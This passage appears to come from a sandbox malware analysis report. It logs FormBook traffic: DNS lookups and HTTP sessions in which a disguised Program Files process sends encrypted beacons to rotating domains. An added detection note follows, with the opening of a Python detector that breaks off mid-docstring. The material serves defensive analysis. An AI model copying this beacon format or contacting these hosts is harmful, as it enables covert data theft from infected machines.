Jan 11, 2025 06:56:38.004153013 CET | 80 | 50021 | 46.38.243.234 | 192.168.2.4
Jan 11, 2025 06:56:38.004252911 CET | 50021 | 80 | 192.168.2.4 | 46.38.243.234
Jan 11, 2025 06:56:38.024276018 CET | 50021 | 80 | 192.168.2.4 | 46.38.243.234
Jan 11, 2025 06:56:38.029083014 CET | 80 | 50021 | 46.38.243.234 | 192.168.2.4
Jan 11, 2025 06:56:39.530934095 CET | 50021 | 80 | 192.168.2.4 | 46.38.243.234
Jan 11, 2025 06:56:39.579201937 CET | 80 | 50021 | 46.38.243.234 | 192.168.2.4
Jan 11, 2025 06:56:40.550791979 CET | 50022 | 80 | 192.168.2.4 | 46.38.243.234
Jan 11, 2025 06:56:40.555730104 CET | 80 | 50022 | 46.38.243.234 | 192.168.2.4
Jan 11, 2025 06:56:40.555916071 CET | 50022 | 80 | 192.168.2.4 | 46.38.243.234
Jan 11, 2025 06:56:40.571866989 CET | 50022 | 80 | 192.168.2.4 | 46.38.243.234
Jan 11, 2025 06:56:40.576801062 CET | 80 | 50022 | 46.38.243.234 | 192.168.2.4
Jan 11, 2025 06:56:41.485034943 CET | 80 | 50021 | 46.38.243.234 | 192.168.2.4
Jan 11, 2025 06:56:41.485100031 CET | 50021 | 80 | 192.168.2.4 | 46.38.243.234
Jan 11, 2025 06:56:42.077713013 CET | 50022 | 80 | 192.168.2.4 | 46.38.243.234
Jan 11, 2025 06:56:42.082772017 CET | 80 | 50022 | 46.38.243.234 | 192.168.2.4
Jan 11, 2025 06:56:42.082854033 CET | 50022 | 80 | 192.168.2.4 | 46.38.243.234
Jan 11, 2025 06:56:43.096959114 CET | 50023 | 80 | 192.168.2.4 | 46.38.243.234
Jan 11, 2025 06:56:43.101768970 CET | 80 | 50023 | 46.38.243.234 | 192.168.2.4
Jan 11, 2025 06:56:43.101892948 CET | 50023 | 80 | 192.168.2.4 | 46.38.243.234
Jan 11, 2025 06:56:43.116882086 CET | 50023 | 80 | 192.168.2.4 | 46.38.243.234
Jan 11, 2025 06:56:43.121840000 CET | 80 | 50023 | 46.38.243.234 | 192.168.2.4
Jan 11, 2025 06:56:43.121861935 CET | 80 | 50023 | 46.38.243.234 | 192.168.2.4
Jan 11, 2025 06:56:43.121876955 CET | 80 | 50023 | 46.38.243.234 | 192.168.2.4
Jan 11, 2025 06:56:43.121889114 CET | 80 | 50023 | 46.38.243.234 | 192.168.2.4
Jan 11, 2025 06:56:43.121912956 CET | 80 | 50023 | 46.38.243.234 | 192.168.2.4
Jan 11, 2025 06:56:43.121927977 CET | 80 | 50023 | 46.38.243.234 | 192.168.2.4
Jan 11, 2025 06:56:43.122011900 CET | 80 | 50023 | 46.38.243.234 | 192.168.2.4
Jan 11, 2025 06:56:43.122025967 CET | 80 | 50023 | 46.38.243.234 | 192.168.2.4
Jan 11, 2025 06:56:43.122075081 CET | 80 | 50023 | 46.38.243.234 | 192.168.2.4
Jan 11, 2025 06:56:44.624617100 CET | 50023 | 80 | 192.168.2.4 | 46.38.243.234
Jan 11, 2025 06:56:44.675328970 CET | 80 | 50023 | 46.38.243.234 | 192.168.2.4
Jan 11, 2025 06:56:45.643762112 CET | 50024 | 80 | 192.168.2.4 | 46.38.243.234
Jan 11, 2025 06:56:45.648871899 CET | 80 | 50024 | 46.38.243.234 | 192.168.2.4
Jan 11, 2025 06:56:45.648987055 CET | 50024 | 80 | 192.168.2.4 | 46.38.243.234
Jan 11, 2025 06:56:45.658754110 CET | 50024 | 80 | 192.168.2.4 | 46.38.243.234
Jan 11, 2025 06:56:45.663589001 CET | 80 | 50024 | 46.38.243.234 | 192.168.2.4
Jan 11, 2025 06:57:04.476636887 CET | 80 | 50023 | 46.38.243.234 | 192.168.2.4
Jan 11, 2025 06:57:04.477436066 CET | 50023 | 80 | 192.168.2.4 | 46.38.243.234
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 11, 2025 06:55:26.621014118 CET | 63718 | 53 | 192.168.2.4 | 1.1.1.1
Jan 11, 2025 06:55:26.637794018 CET | 53 | 63718 | 1.1.1.1 | 192.168.2.4
Jan 11, 2025 06:55:43.315629005 CET | 59355 | 53 | 192.168.2.4 | 1.1.1.1
Jan 11, 2025 06:55:43.332221031 CET | 53 | 59355 | 1.1.1.1 | 192.168.2.4
Jan 11, 2025 06:55:57.597429991 CET | 60084 | 53 | 192.168.2.4 | 1.1.1.1
Jan 11, 2025 06:55:57.660417080 CET | 53 | 60084 | 1.1.1.1 | 192.168.2.4
Jan 11, 2025 06:56:11.144773960 CET | 54254 | 53 | 192.168.2.4 | 1.1.1.1
Jan 11, 2025 06:56:11.359388113 CET | 53 | 54254 | 1.1.1.1 | 192.168.2.4
Jan 11, 2025 06:56:24.690603971 CET | 54622 | 53 | 192.168.2.4 | 1.1.1.1
Jan 11, 2025 06:56:24.710666895 CET | 53 | 54622 | 1.1.1.1 | 192.168.2.4
Jan 11, 2025 06:56:37.956295013 CET | 62685 | 53 | 192.168.2.4 | 1.1.1.1
Jan 11, 2025 06:56:37.995342970 CET | 53 | 62685 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 11, 2025 06:55:26.621014118 CET | 192.168.2.4 | 1.1.1.1 | 0x5334 | Standard query (0) | www.aoivej.info | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:55:43.315629005 CET | 192.168.2.4 | 1.1.1.1 | 0x4da7 | Standard query (0) | www.givvjn.info | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:55:57.597429991 CET | 192.168.2.4 | 1.1.1.1 | 0x9ccd | Standard query (0) | www.gern.dev | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:56:11.144773960 CET | 192.168.2.4 | 1.1.1.1 | 0xdbed | Standard query (0) | www.newbh.pro | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:56:24.690603971 CET | 192.168.2.4 | 1.1.1.1 | 0x6327 | Standard query (0) | www.thinkone.xyz | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:56:37.956295013 CET | 192.168.2.4 | 1.1.1.1 | 0x48e1 | Standard query (0) | www.mraber.dev | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 11, 2025 06:55:26.637794018 CET | 1.1.1.1 | 192.168.2.4 | 0x5334 | No error (0) | www.aoivej.info | - | 47.83.1.90 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:55:43.332221031 CET | 1.1.1.1 | 192.168.2.4 | 0x4da7 | No error (0) | www.givvjn.info | - | 47.83.1.90 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:55:57.660417080 CET | 1.1.1.1 | 192.168.2.4 | 0x9ccd | No error (0) | www.gern.dev | - | 185.151.30.223 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:56:11.359388113 CET | 1.1.1.1 | 192.168.2.4 | 0xdbed | No error (0) | www.newbh.pro | - | 176.57.65.76 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:56:24.710666895 CET | 1.1.1.1 | 192.168.2.4 | 0x6327 | No error (0) | www.thinkone.xyz | - | 209.74.79.41 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:56:37.995342970 CET | 1.1.1.1 | 192.168.2.4 | 0x48e1 | No error (0) | www.mraber.dev | mraber.dev | - | CNAME (Canonical name) | IN (0x0001) | false
Jan 11, 2025 06:56:37.995342970 CET | 1.1.1.1 | 192.168.2.4 | 0x48e1 | No error (0) | mraber.dev | - | 46.38.243.234 | A (IP address) | IN (0x0001) | false
                                                • www.aoivej.info
                                                • www.givvjn.info
                                                • www.gern.dev
                                                • www.newbh.pro
                                                • www.thinkone.xyz
                                                • www.mraber.dev
                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                0 | 192.168.2.4 | 49736 | 47.83.1.90 | 80 | 5552 | C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Jan 11, 2025 06:55:26.670206070 CET | 414 | OUT | GET /ou8k/?TXVlY=nv6XU20pgPTDN0&94=sHhXhPPev91RFxpjPhHA/72AjtyYVyN8Fxcd9dT6JE90JPwt9aU6w+ea6SVS8TAmTGQcFcEZTyl6CSjd+TmOm9tiQhux0BP2yYLzMg1QsJkzQ4A7X5eN3dM= HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-US
                                                Host: www.aoivej.info
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
                                                Jan 11, 2025 06:55:28.273789883 CET | 139 | IN | HTTP/1.1 567 unknown
                                                Server: nginx/1.18.0
                                                Date: Sat, 11 Jan 2025 05:55:28 GMT
                                                Content-Length: 17
                                                Connection: close
                                                Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65
                                                Data Ascii: Request too large


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                1 | 192.168.2.4 | 49789 | 47.83.1.90 | 80 | 5552 | C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Jan 11, 2025 06:55:43.356867075 CET | 667 | OUT | POST /wl3x/ HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Host: www.givvjn.info
                                                Origin: http://www.givvjn.info
                                                Referer: http://www.givvjn.info/wl3x/
                                                Content-Length: 199
                                                Content-Type: application/x-www-form-urlencoded
                                                Cache-Control: no-cache
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
                                                Data Raw: 39 34 3d 46 42 76 66 76 45 6f 4d 74 59 61 4b 6f 66 39 4c 69 42 69 6d 6f 47 78 51 35 76 54 6b 46 74 51 5a 50 53 51 6e 67 74 74 4d 65 51 68 72 4d 4d 66 6c 50 58 67 79 6d 50 69 52 44 6c 52 70 47 75 35 68 52 2b 48 41 38 64 76 71 33 55 32 54 5a 6f 45 76 75 32 61 4b 2b 72 31 50 79 34 55 4e 7a 64 41 70 4b 71 6d 76 4a 73 41 55 4d 76 42 6f 61 70 34 77 75 72 59 58 4b 53 7a 69 74 59 79 73 48 73 4c 45 77 52 36 41 64 51 73 6b 50 31 4c 65 6f 50 67 67 34 47 31 77 49 64 69 47 63 6a 7a 4f 36 49 78 6e 4e 4e 36 64 42 41 73 7a 34 31 61 6b 39 6f 75 6e 4d 77 42 36 4b 57 34 31 31 30 35 78 46 68 50 62 6e 41 3d 3d
                                                Data Ascii: 94=FBvfvEoMtYaKof9LiBimoGxQ5vTkFtQZPSQngttMeQhrMMflPXgymPiRDlRpGu5hR+HA8dvq3U2TZoEvu2aK+r1Py4UNzdApKqmvJsAUMvBoap4wurYXKSzitYysHsLEwR6AdQskP1LeoPgg4G1wIdiGcjzO6IxnNN6dBAsz41ak9ounMwB6KW41105xFhPbnA==


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                2 | 192.168.2.4 | 49805 | 47.83.1.90 | 80 | 5552 | C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Jan 11, 2025 06:55:45.902787924 CET | 687 | OUT | POST /wl3x/ HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Host: www.givvjn.info
                                                Origin: http://www.givvjn.info
                                                Referer: http://www.givvjn.info/wl3x/
                                                Content-Length: 219
                                                Content-Type: application/x-www-form-urlencoded
                                                Cache-Control: no-cache
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
                                                Data Raw: 39 34 3d 46 42 76 66 76 45 6f 4d 74 59 61 4b 70 37 35 4c 6b 6e 71 6d 67 47 78 54 33 50 54 6b 63 64 51 56 50 53 63 6e 67 70 31 63 64 69 31 72 4a 65 58 6c 4f 57 67 79 6c 50 69 52 4a 46 52 73 62 2b 35 71 52 2b 4c 69 38 66 72 71 33 56 53 54 5a 6f 55 76 75 46 79 4a 76 72 31 4a 37 59 55 31 73 4e 41 70 4b 71 6d 76 4a 73 6b 2b 4d 75 70 6f 61 5a 49 77 76 4b 59 57 4a 53 7a 68 6c 34 79 73 4e 4d 4b 44 77 52 36 69 64 53 49 65 50 32 7a 65 6f 4f 51 67 34 55 4e 76 43 64 69 49 53 44 79 64 70 61 51 58 4e 63 7a 56 43 6d 73 36 38 55 65 55 78 4f 6a 39 64 42 67 74 59 57 63 47 6f 7a 77 46 49 69 79 53 38 4c 41 49 65 69 6d 4b 57 4d 42 62 58 4e 47 4e 72 78 35 54 2b 63 77 3d
                                                Data Ascii: 94=FBvfvEoMtYaKp75LknqmgGxT3PTkcdQVPScngp1cdi1rJeXlOWgylPiRJFRsb+5qR+Li8frq3VSTZoUvuFyJvr1J7YU1sNApKqmvJsk+MupoaZIwvKYWJSzhl4ysNMKDwR6idSIeP2zeoOQg4UNvCdiISDydpaQXNczVCms68UeUxOj9dBgtYWcGozwFIiyS8LAIeimKWMBbXNGNrx5T+cw=


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                3 | 192.168.2.4 | 49825 | 47.83.1.90 | 80 | 5552 | C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Jan 11, 2025 06:55:48.444037914 CET | 10769 | OUT | POST /wl3x/ HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Host: www.givvjn.info
                                                Origin: http://www.givvjn.info
                                                Referer: http://www.givvjn.info/wl3x/
                                                Content-Length: 10299
                                                Content-Type: application/x-www-form-urlencoded
                                                Cache-Control: no-cache
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
                                                Data Raw: 39 34 3d 46 42 76 66 76 45 6f 4d 74 59 61 4b 70 37 35 4c 6b 6e 71 6d 67 47 78 54 33 50 54 6b 63 64 51 56 50 53 63 6e 67 70 31 63 64 69 74 72 4a 4c 62 6c 50 31 59 79 6b 50 69 52 46 6c 52 74 62 2b 35 33 52 39 37 6d 38 66 6e 55 33 57 36 54 5a 4c 73 76 6f 30 79 4a 32 37 31 4a 6b 49 55 4f 7a 64 42 7a 4b 71 32 72 4a 73 30 2b 4d 75 70 6f 61 62 67 77 35 72 59 57 45 79 7a 69 74 59 7a 74 48 73 4b 6e 77 52 6a 56 64 53 4d 4f 54 58 54 65 78 75 41 67 30 42 5a 76 66 4e 69 4b 56 44 7a 61 70 61 63 49 4e 59 62 7a 43 6d 77 44 38 55 71 55 69 34 4c 6a 59 41 4d 78 4f 48 70 65 6f 77 49 64 4e 67 69 53 79 4b 39 30 50 54 75 65 4a 4e 74 53 4d 71 37 76 7a 79 6c 44 6c 70 76 52 42 56 76 4f 30 49 64 6a 57 32 57 6b 50 49 7a 49 4b 4b 6d 44 4d 42 4c 51 4f 59 43 32 58 75 72 62 48 76 74 67 47 75 54 33 67 41 58 66 32 61 53 71 49 74 54 6c 51 36 4c 65 44 34 64 49 61 68 58 35 74 43 76 4a 4e 41 65 72 6e 39 6b 53 74 5a 2f 64 42 64 57 69 79 31 36 50 75 41 44 44 62 75 31 37 50 31 68 77 35 35 71 5a 38 77 4b 35 66 4c 67 2f 37 5a 4e 6d 33 53 6e [TRUNCATED]
                                                Data Ascii: 94=[TRUNCATED]


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                4 | 192.168.2.4 | 49842 | 47.83.1.90 | 80 | 5552 | C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Jan 11, 2025 06:55:50.992594957 CET | 414 | OUT | GET /wl3x/?94=IDH/sxYsqLulkbcslybjsGNv3NS6VvVpNQ4SjbhBVw1Jeu7sJntH54CcC3lqE89WX7ek1cbvwkrNRP5o0zeI9ZMZ+p0PiMQUF+eqUdc9aZVsWrUptbZMNnY=&TXVlY=nv6XU20pgPTDN0 HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-US
                                                Host: www.givvjn.info
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
                                                Jan 11, 2025 06:55:52.580343008 CET | 139 | IN | HTTP/1.1 567 unknown
                                                Server: nginx/1.18.0
                                                Date: Sat, 11 Jan 2025 05:55:52 GMT
                                                Content-Length: 17
                                                Connection: close
                                                Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65
                                                Data Ascii: Request too large


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                5 | 192.168.2.4 | 49882 | 185.151.30.223 | 80 | 5552 | C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Jan 11, 2025 06:55:57.683901072 CET | 658 | OUT | POST /xbnt/ HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Host: www.gern.dev
                                                Origin: http://www.gern.dev
                                                Referer: http://www.gern.dev/xbnt/
                                                Content-Length: 199
                                                Content-Type: application/x-www-form-urlencoded
                                                Cache-Control: no-cache
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
                                                Data Raw: 39 34 3d 6d 6f 67 76 4b 43 5a 62 75 4f 56 5a 6a 73 66 61 67 4b 57 32 62 78 63 57 45 44 79 72 45 51 5a 36 4d 30 75 4a 70 77 34 67 7a 73 70 49 74 56 54 30 30 33 55 53 47 49 64 45 6b 43 41 75 47 6b 69 4a 68 65 54 35 2f 4b 6c 45 66 64 53 70 44 7a 4c 5a 32 36 4c 6a 66 78 74 38 35 78 56 6e 51 49 30 57 59 6b 4c 6c 4c 77 34 50 69 51 43 44 5a 46 78 6f 6c 58 75 44 71 57 65 63 39 4d 70 32 70 58 47 4e 69 4a 69 2f 67 61 55 6f 6c 4c 49 39 43 49 33 30 38 36 57 41 4e 77 36 64 5a 45 39 52 73 5a 4d 73 41 6e 6d 44 43 54 42 6f 6a 36 78 4a 30 43 68 47 73 48 78 50 48 33 72 73 32 34 46 59 35 45 6b 72 46 41 3d 3d
                                                Data Ascii: 94=mogvKCZbuOVZjsfagKW2bxcWEDyrEQZ6M0uJpw4gzspItVT003USGIdEkCAuGkiJheT5/KlEfdSpDzLZ26Ljfxt85xVnQI0WYkLlLw4PiQCDZFxolXuDqWec9Mp2pXGNiJi/gaUolLI9CI3086WANw6dZE9RsZMsAnmDCTBoj6xJ0ChGsHxPH3rs24FY5EkrFA==
                                                Jan 11, 2025 06:55:58.437335014 CET | 212 | IN | HTTP/1.1 403
                                                content-length: 93
                                                cache-control: no-cache
                                                content-type: text/html
                                                x-via: ASH1
                                                connection: close
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                6 | 192.168.2.4 | 49899 | 185.151.30.223 | 80 | 5552 | C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Jan 11, 2025 06:56:00.226214886 CET | 678 | OUT | POST /xbnt/ HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Host: www.gern.dev
                                                Origin: http://www.gern.dev
                                                Referer: http://www.gern.dev/xbnt/
                                                Content-Length: 219
                                                Content-Type: application/x-www-form-urlencoded
                                                Cache-Control: no-cache
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
                                                Data Raw: 39 34 3d 6d 6f 67 76 4b 43 5a 62 75 4f 56 5a 6a 4d 50 61 6d 74 36 32 4b 42 63 56 4b 6a 79 72 57 51 59 53 4d 30 71 4a 70 78 4e 39 30 65 39 49 73 77 33 30 31 32 55 53 48 49 64 45 38 53 41 68 5a 30 69 41 68 65 66 62 2f 50 4e 45 66 64 47 70 44 79 37 5a 32 4e 6e 67 65 68 74 2b 6e 52 56 6c 55 49 30 57 59 6b 4c 6c 4c 78 64 59 69 51 4b 44 5a 31 42 6f 33 6c 47 41 30 47 65 66 38 4d 70 32 2b 6e 48 45 69 4a 69 52 67 59 67 47 6c 4a 77 39 43 4a 48 30 38 76 71 44 59 41 36 62 45 55 38 66 72 71 35 30 5a 58 6e 63 49 77 68 4d 70 5a 64 77 34 6b 73 63 39 32 51 59 56 33 50 66 72 2f 4d 73 30 48 5a 69 65 42 2b 74 46 79 77 2b 52 4f 2b 61 57 52 6a 79 44 79 54 41 49 53 77 3d
                                                Data Ascii: 94=mogvKCZbuOVZjMPamt62KBcVKjyrWQYSM0qJpxN90e9Isw3012USHIdE8SAhZ0iAhefb/PNEfdGpDy7Z2Nngeht+nRVlUI0WYkLlLxdYiQKDZ1Bo3lGA0Gef8Mp2+nHEiJiRgYgGlJw9CJH08vqDYA6bEU8frq50ZXncIwhMpZdw4ksc92QYV3Pfr/Ms0HZieB+tFyw+RO+aWRjyDyTAISw=
                                                Jan 11, 2025 06:56:00.988415956 CET | 212 | IN | HTTP/1.1 403
                                                content-length: 93
                                                cache-control: no-cache
                                                content-type: text/html
                                                x-via: ASH1
                                                connection: close
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                7 | 192.168.2.4 | 49915 | 185.151.30.223 | 80 | 5552 | C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Jan 11, 2025 06:56:02.783718109 CET | 10760 | OUT | POST /xbnt/ HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Host: www.gern.dev
                                                Origin: http://www.gern.dev
                                                Referer: http://www.gern.dev/xbnt/
                                                Content-Length: 10299
                                                Content-Type: application/x-www-form-urlencoded
                                                Cache-Control: no-cache
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
                                                Data Raw: 39 34 3d 6d 6f 67 76 4b 43 5a 62 75 4f 56 5a 6a 4d 50 61 6d 74 36 32 4b 42 63 56 4b 6a 79 72 57 51 59 53 4d 30 71 4a 70 78 4e 39 30 65 46 49 73 47 72 30 30 52 34 53 45 49 64 45 69 43 41 31 5a 30 6a 43 68 65 58 66 2f 50 42 2b 66 65 2b 70 5a 51 44 5a 30 34 54 67 48 78 74 2b 76 78 56 6d 51 49 31 55 59 6b 62 68 4c 77 74 59 69 51 4b 44 5a 32 5a 6f 6e 6e 75 41 7a 32 65 63 39 4d 70 71 70 58 48 6f 69 4a 71 6e 67 59 6b 34 6b 34 51 39 43 70 58 30 36 64 43 44 45 51 36 5a 48 55 39 43 72 71 6c 56 5a 58 72 51 49 78 46 79 70 61 42 77 34 6c 4d 4b 36 44 77 59 41 68 58 43 72 34 52 48 38 47 6c 61 64 43 2b 4a 49 54 34 4a 47 39 57 57 57 52 6e 2b 63 78 37 65 55 32 32 44 32 43 6d 58 6f 64 39 6c 78 68 2f 38 31 72 4a 49 63 55 32 34 69 31 47 34 52 54 6d 56 4d 59 74 4b 7a 6e 31 4b 4c 64 37 76 4a 44 4e 79 2f 4e 75 49 7a 4e 64 55 77 74 4b 73 4a 55 72 77 50 71 79 73 54 71 64 78 34 55 4f 4f 77 52 41 49 4e 65 73 33 54 57 4d 30 70 4f 6d 35 45 5a 66 57 41 36 57 2b 56 68 4d 57 55 34 51 37 66 62 57 4b 2b 76 49 5a 4e 6f 32 58 51 7a 46 [TRUNCATED]
                                                Data Ascii: 94=[TRUNCATED]
                                                Jan 11, 2025 06:56:03.564677954 CET | 212 | IN | HTTP/1.1 403
                                                content-length: 93
                                                cache-control: no-cache
                                                content-type: text/html
                                                x-via: ASH1
                                                connection: close
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                8 | 192.168.2.4 | 49928 | 185.151.30.223 | 80 | 5552 | C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Jan 11, 2025 06:56:05.329883099 CET | 411 | OUT | GET /xbnt/?94=rqIPJyQOuOJXv4fam5ihbRMSLxb0TSwIBDm/oxxW981wllDAxGsmTrFlhRhIH2nC7YG/ucdsY/agAUz7mNPlVDgekBEOU7d1VgzmTDcFpkSUd31giEOekxs=&TXVlY=nv6XU20pgPTDN0 HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-US
                                                Host: www.gern.dev
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
                                                Jan 11, 2025 06:56:06.120812893 CET | 275 | IN | HTTP/1.1 403
                                                date: Sat, 11 Jan 2025 05:56:02 GMT
                                                content-type: text/html
                                                content-length: 93
                                                cache-control: no-cache
                                                x-cdn-cache-status: MISS
                                                x-via: ASH1
                                                connection: close
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
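Detection note on sessions 0 to 8 above, with an added example that is not part of the Joe Sandbox report and not FormBook's own code. The encrypted parameter values change on every request and every domain, and the domains themselves are cycled roughly every 13 to 17 seconds with the servers answering 567, 403 or 301, so neither the blobs nor the domain list is a stable indicator. What stays constant is the request shape: a short random directory path, one opaque base64-style parameter, a crawler User-Agent (linkdexbot) sent from a workstation process under Program Files, Connection: close, and on POSTs an Origin and Referer that simply mirror the Host and path. The short token TXVlY=nv6XU20pgPTDN0 is also sent unchanged to three unrelated hosts, which ties the sessions together. The script below scores those structural indicators over request texts constructed from the report (blobs shortened) plus one constructed benign request as a control; the indicator names, regular expressions and threshold are this example's own assumptions.

```python
"""Heuristic beacon detector for the request shape seen in sessions 0 to 8.

Added example for this report: not Joe Sandbox code and not FormBook's own
logic. CAPTURED is constructed from the report (parameter values abbreviated)
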